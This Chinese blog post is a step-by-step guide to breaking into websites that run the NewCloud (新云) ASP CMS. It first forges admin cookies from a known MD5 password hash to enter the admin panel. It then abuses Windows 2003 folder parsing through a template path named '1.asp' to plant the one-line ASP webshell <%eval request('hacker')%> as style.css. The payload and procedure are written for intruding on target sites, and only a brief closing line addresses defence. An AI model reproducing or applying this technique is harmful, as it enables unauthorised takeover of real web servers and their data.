新云网站管理系统后台拿shell

博主推荐【腾讯云】爆款2核2G云服务器首年40元

影响范围:全ACCESS版本,SQL未测试。

新云网站管理系统是现在比较流行的cms系统,功能也算强大,但由于ASP语言本身的安全环境不是很好,所以漏洞多多也不新鲜,我这里一共发现了两个安全隐患,应该说是致命的。
 
一、COOKIES欺骗,进入后台。
大家都知道,一般的后台密码都是MD5加密的,如果管理员把密码设置的复杂一点,即使你在聪明,恐怕也要用个一年半载才能破解出来,但其实,新云的后台只要知道MD5的值就可以进入,这也是一般的ASP程序经常有的情况。
 
方法就是在本地搭设一个相同版本的新云站点,然后用COOKIES修改浏览器,先进入本地的新云管理后台,然后修改COOKIES ,将账号、密码、网址都改成待入侵网站的就可以了,一回车,你就会发现我们已经成功的进入了待入侵网站的后台。
 
这个方法比较简单,也常见,我就不多说了,我的是下面的后台如何取得WEBSHELL.
 
二、后台拿WEBSHELL(系统2003)
我们点击模板管理,新建一个模板,名称随便,但注意模板路径一定要是”1.asp”这类,因为2003会把1.asp解析成为文件夹,新建完成之后我们会看到网站根目录下面会生成一个1.asp的文件夹,这时我们点击编辑CSS样式,我们将整个代码都用<%eval request(“hacker”)%>替换掉,然后点击保存。
 
这时你会发现,在1.asp文件夹下面会新建一个文件style.css,里面的内容就是一句话了。我们将http://my/1.asp/style.css用LACKER2一句话进行连接,可以看到已经连接成功。
 
这样我们就得到了一个WEBSHELL。
 
其实漏洞形成的原因无非就是过滤不严密造成的,使用新云的朋友一定要保护好数据库和后台,否则你就惨喽。

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/4683.html

新云网站管理系统后台拿shell:等您坐沙发呢!

发表评论

3 + 0 =

快捷键:Ctrl+Enter